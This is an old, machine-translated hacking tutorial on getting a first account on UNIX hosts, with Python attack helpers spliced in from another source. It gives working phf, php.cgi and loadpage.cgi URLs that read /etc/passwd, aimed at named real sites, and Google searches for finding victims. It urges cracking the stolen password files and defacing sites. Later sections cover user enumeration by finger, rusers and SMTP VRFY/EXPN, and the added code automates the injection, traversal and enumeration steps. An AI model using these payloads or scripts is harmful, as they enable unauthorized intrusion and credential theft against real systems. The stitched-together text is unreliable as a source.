"UNIX Series System Invasion Course" |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  Hacker file>>invasion analysis>> "UNIX Series System 
                  Invasion Course" one  Printing

            "UNIX Series System Invasion Course" one 
            Www.cshu.net  2002-8-28  fog rain village 

              "UNIX Series System Invasion Course" one 
              ------------------ Nimble use resources
              ==========================================
              My first about U the N I X course, I wants to say besides looks 
              for the first account number, but also some - - - nimble use 
              resources.
              Perhaps you will feel strange, what relations this "nimbly and U N 
              I X does have using the resources"?
              Yes, indeed does not have any very big relations.
              But this is my experience introduction.
              The nimble use existing resources, we work can achieve the twice 
              the result with half the effort effect.
              Perhaps, your still did not understand my meaning.
              Do not be anxious. is coming with me.
              :)
I'm sure everyone knows the famous phf hole.
Vulnerability description: the util.c code shipped with the non-commercial NCSA and Apache web servers (version 1.1.1 and earlier) lets a remote attacker run arbitrary commands through the phf CGI. The commands run with the privileges of the httpd process: that is root only on servers that were started as root, and the unprivileged "nobody" user otherwise, so "runs as root" holds only when the administrator ran the server that way.
http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
The trick is the %0a: util.c escaped the usual shell metacharacters but not the newline, so the line break ends the ph command and whatever follows it runs as a second shell command.
This hole is four years old. Can we still find it today?
The answer: certainly! :)
http://www.mohall.k12.nd.us/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
There it is.
Take a look: the password file isn't even shadowed. Judging from the password file, this site isn't very big.
Another one:
http://www.grex.org/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Now that is a fat chicken: 2,395 users. Wow...
Go find some cracking software and run the whole file through it; Xiao Rong's Luandao (乱刀) is quite good.
This hole lets you execute commands remotely directly, too; for the details read the article "80-Port Intrusion".
Once you've cracked a user's password you can also telnet or ftp in and have a look.
Or just deface it.
Ha-ha.
But I won't do that.
Does everyone find it strange?
All these years, and the hole is still there.
How did I find them?
Don't worry.
I'll tell you later.
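To make the mechanism of the phf hole concrete, here is an added Python re-creation of the escaping bug. It is not the util.c or phf.c code and not part of the original article; the metacharacter set in SHELL_SPECIALS and the "ph -m field=value" command layout are assumptions approximating the originals. The point it shows is that the escaper handles the usual shell metacharacters but not the newline, so a %0a in a Q* field starts a second command once the string reaches /bin/sh; the hardened version at the end builds an argv list and uses no shell at all.

```python
import re
from typing import Callable, List
from urllib.parse import parse_qs

# Shell metacharacters the escaper backslash-escapes. This set is an assumption
# standing in for what util.c's escape_shell_cmd() covered; what matters is
# what is absent from it: the newline, 0x0a.
SHELL_SPECIALS = set("&;`'\"|*?~<>^()[]{}$\\")


def escape_shell_cmd_phf(s: str) -> str:
    """Re-creation of the buggy escaper: every SHELL_SPECIALS character gets
    a backslash, but a newline passes through untouched."""
    return "".join(("\\" + c) if c in SHELL_SPECIALS else c for c in s)


def escape_shell_cmd_fixed(s: str) -> str:
    """The same escaper with CR and LF treated as specials too. A
    backslash-newline is a line continuation to /bin/sh, so the injected
    text can no longer start a second command."""
    return "".join(("\\" + c) if (c in SHELL_SPECIALS or c in "\r\n") else c
                   for c in s)


def phf_command_line(query_string: str, escaper: Callable[[str], str]) -> str:
    """Build the 'ph' command line that phf handed to a shell via popen().
    Only fields whose name starts with 'Q' are forwarded, as 'field=value'
    pairs after 'ph -m' (an approximation of phf.c's layout, not a copy).
    parse_qs() URL-decodes, so %0a arrives here as a real newline."""
    fields = parse_qs(query_string, keep_blank_values=True)
    parts = ["ph", "-m"]
    for name, values in fields.items():
        if name.startswith("Q"):
            parts.append(name[1:].lower() + "=" + escaper(values[0]))
    return " ".join(parts)


def shell_commands(cmdline: str) -> List[str]:
    """What /bin/sh actually executes: one command per unescaped newline."""
    return [c for c in re.split(r"(?<!\\)\n", cmdline) if c.strip()]


def ph_argv_safe(query_string: str) -> List[str]:
    """Hardened equivalent: reject control characters, build an argv list and
    hand it to exec without any shell. A real CGI would then call
    subprocess.run(argv, capture_output=True); the argv is returned here
    instead because ph is not installed."""
    fields = parse_qs(query_string, keep_blank_values=True)
    argv = ["ph", "-m"]
    for name, values in fields.items():
        if name.startswith("Q"):
            value = values[0]
            if any(ord(c) < 0x20 for c in value):
                raise ValueError("control character in field %s" % name)
            argv.append(name[1:].lower() + "=" + value)
    return argv


if __name__ == "__main__":
    attack = "Qalias=x%0a/bin/cat%20/etc/passwd"   # the query from the text
    print(shell_commands(phf_command_line(attack, escape_shell_cmd_phf)))
    print(shell_commands(phf_command_line(attack, escape_shell_cmd_fixed)))
```

With the buggy escaper the attack query becomes two shell commands, "ph -m alias=x" and "/bin/cat /etc/passwd"; with the newline escaped it stays one harmless line, and the argv version refuses the input outright. Escaping lists are always one character short of complete, which is why the no-shell version is the one worth copying.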
Name: php.cgi 2.0beta10 and earlier
Description: contains a buffer overflow, and also a hole that lets an intruder read any file on the system that the "nobody" user can read.
http://www.victim.com/cgi-bin/php.cgi?/etc/passwd
php.cgi 2.1 can only read .shtml files. As for the password file, comrades, note that it may instead live in /etc/master.passwd (BSD) or /etc/security/passwd (AIX) and so on.
Everyone knows this hole too; it is also very old.
We can find hosts that have it just the same.
http://hellas.me.ntou.edu.tw/cgi-bin/php.cgi?/etc/passwd
:) A Taiwanese one.
http://www.pcsc.net/cgi-bin/php.cgi?/etc/passwd
No idea what site that is.
http://www.ccchubu.co.jp/cgi-bin/php.cgi?/etc/passwd
A Japanese site. Let's give it a couple of kicks!
Want more?
http://www.lifesupportal.com/cgi-bin/php.cgi?/etc/passwd
http://www.ub.fu-berlin.de/cgi-bin/php.cgi?/etc/passwd
http://www.compfutures.com/cgi-bin/php.cgi?/etc/passwd
http://edu.larc.nasa.gov/cgi-bin/php.cgi?/etc/passwd
The php.cgi hole can only read files.
Either way, we run the passwords through Luandao.
Once you have a user's password, you can telnet or ftp in.
How did I find these, too?
Don't worry.
I'll tell you later.
Name: loadpage.cgi
Description: can be used to view arbitrary files. First use the browser to find the current directory:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ
This will probably return an error message like: Cannot open file /home/www/shop/XYZ
Now change it to the form:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../<path>/<filename>
Concretely:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd
Have a look:
http://www.valueindia.com.au/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
Oh, @#$%@$@#%$!~......
Just a few days ago I could still read the password file there.
Now it has probably been patched, or the file removed, or a firewall is filtering it.
Damn. Let's look at another one.
http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd
Hmm, why a 500 error?
That is what the vulnerability handbook says to use.
Ha-ha.
We have to apply it flexibly; it is a path problem.
We change it to: http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../etc/passwd
Cannot open file /usr/local/etc/httpd/htdocs/bigfivestuff/store//../../etc/passwd
??
Still a path problem.
Our path doesn't climb far enough.
The current directory is /usr/local/etc/httpd/htdocs/bigfivestuff/store/
/../../etc/passwd only climbs two levels.
That leaves us in /usr/local/etc/httpd/htdocs/
There are another five directories above that.
So we add five more "../":
http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../etc/passwd
See it?
The password file.
But it's shadowed.
We can still use it to produce a user list and then probe with Xiao Rong's Fluxay (流光) FTP probe.
:)
Want more?
http://qtb.com/cgi-bin/loadpage.cgi?user_id=1&file=../../../../etc/passwd
http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
http://www.cheapcellphones.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
http://www.boutiquesensuale.net/cgi-bin/loadpage.cgi?user_id=1&file=../../../../etc/passwd
http://www.patches3.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
http://www.topten.it/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
http://www.palmcentre.co.uk/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
http://www.storefinder.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
Enough to make your head spin.
A big pile of password files.
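The loadpage.cgi walk-through above and the php.cgi file read before it both end with the same two questions: how many "../" does the traversal need, and what can you do with a password file once you have it? The following is an added Python example, not code from the article or from either CGI. It takes the base directory leaked by the "Cannot open file" error, computes the exact number of "../" to reach the root (checking with posixpath.normpath that the server-side open() really lands on /etc/passwd, which is why the two-level attempt in the text failed), and then parses the returned file to separate crackable hashes from a shadowed file's user list. The passwd content is constructed for the example; the oracle hash is a made-up 13-character string, not the hash of anything.

```python
import posixpath
import re
from typing import Dict, List, Optional

ERROR_RE = re.compile(r"Cannot open file (\S+)")
# Second-field values that mean "the hash lives in the shadow file".
PLACEHOLDER_HASHES = {"x", "*", "!", "!!", "*LK*", "NP", ""}

# Constructed /etc/passwd, modeled on a SunOS 5.6 layout; the oracle hash is
# a made-up 13-character DES-shaped string.
SAMPLE_PASSWD = """\
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
nobody:x:60001:60001:Nobody:/:
oracle:abJnggxhB/yWI:1001:100:Oracle DBA:/export/home/oracle:/bin/ksh
webadm:x:1002:100:Web admin:/export/home/webadm:/bin/sh
guest:x:1003:100:Guest:/export/home/guest:/bin/false
"""


def base_dir_from_error(body: str, probe_name: str) -> Optional[str]:
    """loadpage.cgi's 'Cannot open file <dir><file>' error leaks the
    directory it prepends to the file parameter. Given the probe filename we
    sent, return that directory (trailing slash kept), or None if no leak."""
    m = ERROR_RE.search(body)
    if not m or not m.group(1).endswith(probe_name):
        return None
    return m.group(1)[: -len(probe_name)]


def traversal_param(base_dir: str, target: str) -> str:
    """One '../' per directory component of base_dir, then the absolute
    target: exactly enough to climb to '/' however deep the CGI lives."""
    depth = len([p for p in base_dir.split("/") if p])
    return "/" + "../" * depth + target.lstrip("/")


def resolves_to(base_dir: str, param: str) -> str:
    """Where the server-side open() really lands after '..' collapsing.
    The CGI concatenates blindly, so 'store/' + '/../..' gives 'store//../..'
    and normpath treats the doubled slash as a single separator."""
    return posixpath.normpath(base_dir + param)


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Parse /etc/passwd lines into dicts; comments and short lines skipped."""
    rows = []
    for line in text.splitlines():
        f = line.strip().split(":")
        if len(f) < 7 or line.startswith("#"):
            continue
        rows.append({"user": f[0], "hash": f[1], "uid": f[2],
                     "home": f[5], "shell": f[6]})
    return rows


def crackable_hashes(rows: List[Dict[str, str]]) -> Dict[str, str]:
    """Entries whose second field is a real hash (13-char DES or longer),
    i.e. what goes to a cracker. A shadowed file yields nothing."""
    return {r["user"]: r["hash"] for r in rows
            if r["hash"] not in PLACEHOLDER_HASHES and len(r["hash"]) >= 13}


def login_candidates(rows: List[Dict[str, str]]) -> List[str]:
    """Accounts worth probing over ftp/telnet even when the file is shadowed:
    root, or a regular user (Solaris keeps system accounts below uid 100 and
    nobody at 60001), and no login-denying shell. An empty shell field means
    /bin/sh on SunOS, so it is not treated as 'no login'."""
    no_login = {"/bin/false", "/usr/bin/false", "/bin/true", "/sbin/nologin"}
    out = []
    for r in rows:
        uid = int(r["uid"]) if r["uid"].isdigit() else -1
        if r["shell"] in no_login:
            continue
        if uid == 0 or 100 <= uid < 60000:
            out.append(r["user"])
    return out


if __name__ == "__main__":
    base = base_dir_from_error("Cannot open file /home/www/shop/XYZ", "XYZ")
    param = traversal_param(base, "/etc/passwd")
    print(param, "->", resolves_to(base, param))
    rows = parse_passwd(SAMPLE_PASSWD)
    print(crackable_hashes(rows), login_candidates(rows))
```

For the bigfivestuff.com directory in the text, traversal_param() produces seven "../", the same count the author reached by hand, and resolves_to() shows why "/../.." alone only reached /usr/local/etc/httpd/htdocs/etc/passwd. On the constructed file the only crackable entry is oracle; root, oracle and webadm are the accounts worth feeding to an ftp probe.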
Now I'll tell you how I found them.
:) We go to http://www.google.com/ (a very good search engine).
Of course you can also use http://www.yahoo.com
Type /cgi-bin/phf into the search box and press Enter.
We get a page with content like this:
Searched the Internet for /cgi-bin/phf. About 7,320 results; showing 1-10. Search took 0.08 seconds.
Category: Regional > North America > ... > DOE National Laboratories > Ames Laboratory
Untitled
lcweb.loc.gov/cgi-bin/phf/ - Similar pages
Untitled
lcweb.loc.gov/cgi-bin/phf - Similar pages
Ames Phone Book - People
Category: Regional > North America > ... > DOE National Laboratories > Ames Laboratory
ph.iastate.edu/cgi-bin/phf - Similar pages
All of these sites have /cgi-bin/phf.
Some of them may well be running a version that has the hole and was never patched!
We try http://xxx.xxxxxxxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
If that is no good, search for /cgi-bin/php.cgi or /cgi-bin/loadpage.cgi.
Of course you can try other similar holes too.
The Internet is so big, you can always find some!
But we did this rather stupidly.
These are not new holes, after all, so finding a usable one takes work.
Why do it this way, then?
Because if a hole is discovered tomorrow that lets you read a file or run a command straight from a URL, you can use a search engine to find hosts that have it in exactly the same way.
Why can we still see holes from three years ago?
Because people are all different; certainly not every administrator is that responsible. :)
Also, if there is some hole you don't understand, or you need some document or piece of software, you can look for it with a search engine just the same!
For example, twwwscan reports a "Frontpage98 Hole (_vti_inf.html)" that we don't understand, so we type _vti_inf.html into the search engine and find plenty of related articles and material.
That's a small trick. :)
These engines' data is collected by robots that keep crawling and updating it. These robots are not the kind we usually hear about; they are web spider programs written in perl or other languages, and some people use such programs to harvest e-mail addresses. OK, I'm getting off topic.
Using these engines, I believe everyone can find a lot of what they want!
Good, back to the subject. :)
I believe many of you don't know what you should study.
Here is a good introduction.
1. Be able to program in C/C++, perl or another language.
For a hacker this is a basic requirement. Many security tools are written in C/C++ or perl. A beginning hacker must at least be able to read, compile, run and skillfully use these programs. You can use these ready-made tools to attack. Going a step further, you should be able to port software to other platforms, or have the ability to develop: for instance, write new tools or extend existing ones!
2. Be familiar with the TCP/IP protocols.
This is another quality a hacker must have. Without a correct and thorough understanding of the protocols, if you can only muddle along with tools every day, you will never make progress. Without a basic understanding of how the Internet works, there is no point even discussing attacks. The way to learn the protocols is first to get familiar with the RFCs; here is one place to get them:
http://www.attrition.org/~modify/texts/rfc/
3. Be familiar with at least two operating systems.
For instance NT/2000, Linux, Unix, SunOS and so on.
The UNIX family is the one you must understand.
4. Keep up with the latest vulnerability information and tools.
Pay close attention to the vulnerability information and tools published online.
The domestic response, by comparison, is rather slow.
I recommend everyone go to: http://www.securityfocus.com/
5. To become a hacker, you must start hacking.
Besides reading intrusion tutorials, after reading you must certainly get your hands dirty! Only by doing hacking yourself can you make progress. Only through a great deal of practice can you skillfully use each attack method. Being an armchair strategist is useless. Reading many tutorials without doing anything is useless too! In the end you still know nothing!
6. A person can only rely on himself.
Many netizens, after adding me as a friend, open with: "Will you take me on as your student?" :( Sigh, and they keep coming.
When you study hacking techniques deeply, you discover how little you understand! I certainly don't understand much myself. I really don't have the ability to be your teacher; I am only a very ordinary network technology amateur. Don't think too highly of me. Perhaps I am the biggest newbie. :)
Actually, not everyone has as much free time as you; everyone has a job, everyone has their own affairs, and nobody can think everything through for you! Nor is anybody willing to spend time on such boring matters. Everybody should look at it from the other side: if 20 people were chatting with you on OICQ at the same time, how would you cope? 50? 100? Could you deal with that?
At the same time, many people ask me to crack a mailbox, a chatroom or an OICQ password, or to kick people out of a chatroom.... It really is boring. Even with a full stomach and nothing to do, I won't do these repetitive, meaningless things. Even if you have cracked 10,000 passwords or kicked 10,000 people, what does that prove about you? Friends, don't waste your precious online time! Do something meaningful.
Generally our hacking steps are:
1. Information gathering
2. Remote attack
3. Remote login
4. Obtain ordinary user privileges
5. Obtain superuser privileges
6. Leave a back door
7. Clear the logs
This can be simplified to:
1. Get the first account
2. Get superuser privileges
3. Leave a back door
4. Wipe the "footprints"
Today we talk about how to find our first account!
(1) First we set a target, for instance a "reactionary" site! If you have no concrete target, use the Chinese-localized Superscan 3.0 that I released to everyone to scan a block of addresses and search for hosts. I like to scan port 79 with it; the data it produces is very useful. Use it a lot and you'll see. :) We can also use a search engine to look! For instance, type Japan into the engine and you'll find a big pile of Japanese websites and homepages, then pick one from the middle to try. :)
(2) Next is information gathering. Once we have decided on a target, we run a series of scans against it: for instance a port scan with Superscan 3.0, a web vulnerability scan with Twwwscan, and a comprehensive scan with Nmap, Saint, Satan or some other scanner. What we said at the start is a very good example: look for any hole that directly gives us the password file or lets us run commands! That can save a lot of trouble.
1. First we'll probably ping the host and try to judge the type of machine.
For instance:
ping www.eee.com.tw        # hypothetical address :)
Pinging www.eee.com.tw [203.69.121.***] with 32 bytes of data:
Reply from 203.69.121.***: bytes=32 time=60ms TTL=243
Reply from 203.69.121.***: bytes=32 time=60ms TTL=243
Reply from 203.69.121.***: bytes=32 time=80ms TTL=243
Reply from 203.69.121.***: bytes=32 time=70ms TTL=243
Ping statistics for 203.69.121.***:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 60ms, Maximum = 80ms, Average = 67ms
time=60ms is the round-trip time, which reflects the speed of the path to the target machine.
From TTL=243 we can roughly guess the type of machine: SunOS 5.6. If TTL=128 it is Win2000. The value you see is the initial TTL chosen by the sender's operating system minus one for every router hop, so 243 means a host that started at 255 (SunOS/Solaris and many other Unixes) twelve hops away, while Windows starts at 128 and Linux at 64; it is a rough guess, not proof. Pay attention to these things as you go. :) Accumulate them slowly.
2. After pinging the machine, we port-scan the target. The main purpose is to discover which service ports the target system has open, infer from them which services are running, and then look up material on those services. There are many port scanners; the one I use all the time, and recommend with all my heart, is Superscan 3.0. Common ports include: 21=ftp, 23=telnet, 25=smtp, 79=finger, 110=pop3, 111=sunrpc, 513=login, 514=shell, 515=printer...
Port 21, ftp: we might think of the wu-ftpd 2.x remote overflow.
Port 23, telnet: at least we know we can log in remotely and run commands; telnet to the host to look at the system information. :)
Port 25, smtp: can confirm users, and there is also the series of sendmail holes.
Port 79, finger: we can use this port to list the host's users. :)
Port 110, pop3: I don't think it's useful.
Port 111, rpc: try some of the famous remote overflows.
Port 513, rlogin: can be used to log in, or somebody may already have planted an rhosts back door on the machine. :) Also try the rlogin remote overflow.
Port 514, rsh: similar to rlogin, but it does not require an interactive login. :)
Port 515, network printing? Try netpr.c :)
...
All of these services either give away important knowledge about the system for free, or provide some way for a user to "log in" to the system, or let a user execute system programs remotely; so every one of them is a possible avenue of intrusion.
3. Generally, after the port scan, if port 23 telnet is open we telnet to the host to see the system version, and then check whether that version has any significant holes. :)
telnet www.eee.com.tw
We see something like:
SunOS 5.6
login:
So it is SunOS 5.6.
Then we think: what useful holes does this version have? :)
This machine also has port 79 open, so we finger it.
This is the most primitive and also the most effective way to get a first user account.
We run it under Linux/UNIX/NT; Win9x has no finger client.
finger @www.eee.com.tw
This shows who is logged in.
[www.eee.com.tw]
No one logged on
Nobody online.
finger @www.eee.com.tw
[www.epson.com.tw]
Login       Name                TTY     Idle   When   Where
robert      RD                  <....>
rd-1        RD                  <....>
rd-2        RD                  <....>
rd-3        RD                  <....>
rd-4        RD                  <....>
agent       all agents login    0                     ettdb
artwork     ???                 <....>
oracle      ???                 287
eee survey  ???                 pts/2                 epson5
eeeclub     ???                 <....>
webadm      ???                 pts/1                 eee5
agtrpt      all agents login    <....>
genuine     ???                 791                   ettdb
weblink     ???                 349                   eee5
wardpro     ???                 791                   ettdb
nstark      ???                 pts/1                 eee5
eee         ???                 pts/2                 202.111.143.*
cbgmaster   ???                 pts/2                 210.12.11.*
Here come the goodies.
Under Login are the users on the host! (The ??? entries are names garbled in the original page.)
We can also run finger username@www.eee.com.tw to look up the details of a particular user. :)
finger cbgmaster@www.eee.com.tw
Everybody find a machine and try it.
202.228.128.34
202.228.128.33
202.228.128.35
202.228.128.36
202.228.128.38
202.228.128.39
202.228.129.21
Japanese IPs you can finger.
Have a look.
For finger under Win9x we can use software, for instance Tianxing's Network Assassin II, or finerf.
Here I recommend finerf.
You can download it here: http://www.cnhonker.com/finger.zip
Run it through a virus scanner first. :)
Scanning port 79 with Superscan 3.0 under Win9x and then getting the users with finerf is a very good combination!
If finger turns up too many users, we can use Xiao Rong's Fluxay FTP probe to help us confirm them.
Generally speaking, an account allowed to ftp into a host is also allowed to telnet in.
We can also use the rusers command. "Remote users", as the name suggests, queries a remote host for information about its users; it is similar to finger.
rusers -l www.eee.com.tw
root   www.eee.com.tw:console   May 7 10:03   22    (:0)
john   www.eee.com.tw:pts/6     May 7 12:56   26    (mor.com)
will   www.eee.com.tw:pts/7     May 7 10:11         (zw.com)
mary   www.eee.com.tw:pts/11    May 7 09:53   3:37  (foo.com)
paul   www.eee.com.tw:pts/10    May 7 13:08   18    (sil.com)
This lists all active users on www.eee.com.tw.
This command is only available under Linux/Unix.
So it is best to install Linux yourself.
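The finger and rusers listings above are read by eye in the text; when a scan of port 79 across a whole address block comes back, you want the same reading done by a program. The following is an added Python example, not code from the article or from any of the tools it names. It parses the output formats shown above into a login list for the ftp probe, and also pulls out the Where column, because the hosts users come in from (ettdb, eee5, the remote addresses) are the next targets for .rhosts trust and reused passwords. The two sample outputs are constructed, modeled on the page's listings with TEST-NET addresses in place of real ones; finger_host() wraps the system finger client and is the only part that touches the network.

```python
import re
import subprocess
from typing import List

# Constructed finger output modeled on the listing in the text (Solaris
# column layout; addresses are documentation ranges, not real hosts).
SAMPLE_FINGER = """\
[www.eee.com.tw]
Login       Name               TTY         Idle    When    Where
robert      RD                             < .  .  .  . >
oracle      ???                pts/3       287  Fri 09:10  ettdb
webadm      ???                pts/1            Fri 13:02  eee5
eee         ???                pts/2            Fri 13:40  192.0.2.7
cbgmaster   ???                pts/4            Fri 13:41  198.51.100.5
webadm      ???                pts/5            Fri 13:50  eee5
"""

# Constructed 'rusers -l' output in the layout shown in the text.
SAMPLE_RUSERS = """\
root     www.eee.com.tw:console  May  7 10:03    22  (:0)
john     www.eee.com.tw:pts/6    May  7 12:56    26  (mor.com)
will     www.eee.com.tw:pts/7    May  7 10:11        (zw.com)
mary     www.eee.com.tw:pts/11   May  7 09:53  3:37  (foo.com)
paul     www.eee.com.tw:pts/10   May  7 13:08    18  (sil.com)
"""

HOSTLIKE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.*:_-]*$")
NOT_A_HOST = re.compile(r"^(pts/|tty|console|\d+$)")   # tty names, idle minutes


def _dedup(items: List[str]) -> List[str]:
    seen, out = set(), []
    for it in items:
        if it not in seen:
            seen.add(it)
            out.append(it)
    return out


def users_from_finger(output: str) -> List[str]:
    """Login names from 'finger @host': first column of every data row.
    The [host] banner, the column header and 'No one logged on' are skipped."""
    users = []
    for line in output.splitlines():
        line = line.strip()
        if (not line or line.startswith("[") or line.startswith("Login")
                or line.lower().startswith("no one")):
            continue
        users.append(line.split()[0])
    return _dedup(users)


def origins_from_finger(output: str) -> List[str]:
    """The Where column: hosts and addresses users logged in from. Rows that
    end in a tty, an idle count or the '< . . >' never-logged-in marker
    contribute nothing."""
    origins = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) < 2 or line.startswith("[") or parts[0] == "Login":
            continue
        last = parts[-1]
        if HOSTLIKE.match(last) and not NOT_A_HOST.match(last):
            origins.append(last)
    return _dedup(origins)


def users_from_rusers(output: str) -> List[str]:
    """'rusers -l' rows are: user host:tty date time idle (from)."""
    return _dedup([p[0] for p in (l.split() for l in output.splitlines())
                   if len(p) >= 2 and ":" in p[1]])


def origins_from_rusers(output: str) -> List[str]:
    """The parenthesised (from) field; ':0' is a local X display, not a host."""
    origins = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[-1].startswith("("):
            frm = parts[-1].strip("()")
            if frm and not frm.startswith(":"):
                origins.append(frm)
    return _dedup(origins)


def candidate_accounts(*lists: List[str]) -> List[str]:
    """Merge user lists from several sources into one probe dictionary."""
    merged = []
    for lst in lists:
        merged.extend(lst)
    return _dedup(merged)


def finger_host(host: str, timeout: float = 15) -> List[str]:
    """Run the system finger client against host and parse its output."""
    proc = subprocess.run(["finger", "@" + host], capture_output=True,
                          text=True, timeout=timeout, check=False)
    return users_from_finger(proc.stdout)


if __name__ == "__main__":
    print(candidate_accounts(users_from_finger(SAMPLE_FINGER),
                             users_from_rusers(SAMPLE_RUSERS)))
    print(origins_from_finger(SAMPLE_FINGER), origins_from_rusers(SAMPLE_RUSERS))
```

The Where column is parsed by last token on purpose: Solaris finger pads the columns by width, so positional slicing breaks on long names, but the origin is always the final field when there is one.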
Confirming users via port 25.
telnet www.eee.com.tw 25
Trying xxx.xxx.xxx.xxx...
Connected to www.eee.com.tw.
Escape character is '^]'.
220 numen.com ESMTP Sendmail 8.9.1b+Sun/8.9.1; Fri, 7 May 1999 14:01:39 +0800 (CST)
expn root
250 Super-User
expn eee
250
vrfy www
550 www... User unknown
With the "vrfy" or "expn" commands we can determine whether a specific user exists on the host: above, "root" and "eee" are users that exist on the machine, while "www" does not.
Its use: if we cannot get a user list from the target with finger or rusers, we can use this method to guess users.
By guessing some common account names, we confirm which users exist on the host.
Then we can crack the passwords of those accounts.
One caveat: a sendmail configured with the novrfy/noexpn privacy options answers 252 ("Cannot VRFY user") or 502 to every query instead of 250/550; then only RCPT TO: in an ordinary delivery attempt still tells valid recipients from invalid ones.
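The telnet session above is done by hand; the following is an added Python example, not code from the article, that runs the same VRFY/EXPN exchange for a whole list of candidate names and classifies each reply (250/251 exists, 55x unknown, 252 inconclusive, 500/502 disabled), falling back from VRFY to EXPN when the server will not verify. So that it runs offline, it includes a constructed one-connection fake sendmail whose wording mimics the 8.9-era replies in the text; the host name numen.com and the known users are assumptions from the page, and nothing here sends mail.

```python
import socket
import threading
from typing import Dict, List, Tuple


def start_fake_sendmail(known: Dict[str, str], vrfy_allowed: bool = True) -> Tuple[str, int]:
    """Constructed test fixture: serve exactly one SMTP connection on
    127.0.0.1 and answer like a Sendmail 8.9 would. known maps login name to
    the full name shown in the 250 reply; vrfy_allowed=False models the
    'novrfy' privacy option (252 to every VRFY, EXPN still answered)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    addr = srv.getsockname()

    def serve() -> None:
        conn, _ = srv.accept()
        srv.close()
        with conn, conn.makefile("rb") as f:
            conn.sendall(b"220 numen.com ESMTP Sendmail 8.9.1b+Sun/8.9.1 (constructed)\r\n")
            for raw in f:
                cmd, _, arg = raw.decode("latin-1").strip().partition(" ")
                cmd = cmd.upper()
                if cmd == "QUIT":
                    conn.sendall(b"221 numen.com closing connection\r\n")
                    break
                if cmd == "HELO":
                    reply = "250 numen.com Hello " + arg
                elif cmd == "VRFY" and not vrfy_allowed:
                    reply = "252 Cannot VRFY user; try RCPT to attempt delivery"
                elif cmd in ("VRFY", "EXPN"):
                    reply = ("250 %s <%s@numen.com>" % (known[arg] or arg, arg)
                             if arg in known else "550 %s... User unknown" % arg)
                else:
                    reply = "500 Command unrecognized"
                conn.sendall((reply + "\r\n").encode("latin-1"))

    threading.Thread(target=serve, daemon=True).start()
    return addr


def _reply(f) -> str:
    """Read one SMTP reply, following '250-' continuation lines."""
    lines = []
    while True:
        raw = f.readline()
        if not raw:
            break
        line = raw.decode("latin-1").rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            break
    return "\n".join(lines)


def classify(reply: str) -> str:
    """Map the reply code to what it tells us about the queried name."""
    code = reply[:3]
    if code in ("250", "251"):
        return "exists"
    if code in ("550", "551", "553"):
        return "unknown"
    if code == "252":
        return "inconclusive"      # novrfy: only RCPT TO would tell
    if code in ("500", "501", "502"):
        return "disabled"
    return "other"


def smtp_probe_users(host: str, port: int, users: List[str],
                     helo: str = "probe.example.net") -> Tuple[str, Dict[str, Dict[str, str]]]:
    """HELO, then VRFY each name; if VRFY is refused or inconclusive, try
    EXPN and keep its verdict when it is definite. Returns (banner, results)."""
    results: Dict[str, Dict[str, str]] = {}
    with socket.create_connection((host, port), timeout=15) as s:
        f = s.makefile("rb")
        banner = _reply(f)
        s.sendall(("HELO %s\r\n" % helo).encode("latin-1"))
        _reply(f)
        for user in users:
            s.sendall(("VRFY %s\r\n" % user).encode("latin-1"))
            reply = _reply(f)
            status = classify(reply)
            if status in ("inconclusive", "disabled"):
                s.sendall(("EXPN %s\r\n" % user).encode("latin-1"))
                second = _reply(f)
                if classify(second) in ("exists", "unknown"):
                    reply, status = second, classify(second)
            results[user] = {"status": status, "reply": reply}
        s.sendall(b"QUIT\r\n")
        _reply(f)
    return banner, results


if __name__ == "__main__":
    host, port = start_fake_sendmail({"root": "Super-User", "eee": ""})
    banner, res = smtp_probe_users(host, port, ["root", "eee", "www"])
    print(banner)
    for name, r in res.items():
        print(name, r["status"], r["reply"])
```

Against a real host, point smtp_probe_users() at port 25 with the common-account dictionary from later in this article; the banner it returns is the same version string the manual session shows, which is worth keeping for the sendmail hole lookup.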
Also, we can usually guess users from the domain name, the hostname, and the contact mailbox on the main page.
The hostname we can see through ftp:
C:\>ftp www.eee.com.tw
Connected to www.eee.com.tw.
220 eee FTP server (SunOS 5.6) ready.
===eee is the hostname!
User (www.eee.com.tw:(none)):
Of course we can also guess some common user names and try their passwords on the host.
Below are the account names I commonly come across, for reference:
root admin sys guest ftp system system32 smtp mail site linux daemon bin test www adm html web webmaster anon oracle sybase database install john reboot tom sync info informix public webadm webadmin server user and so on
You can certainly build a dictionary of common account names and probe the passwords over ftp.
The oracle user's default password is oracle.
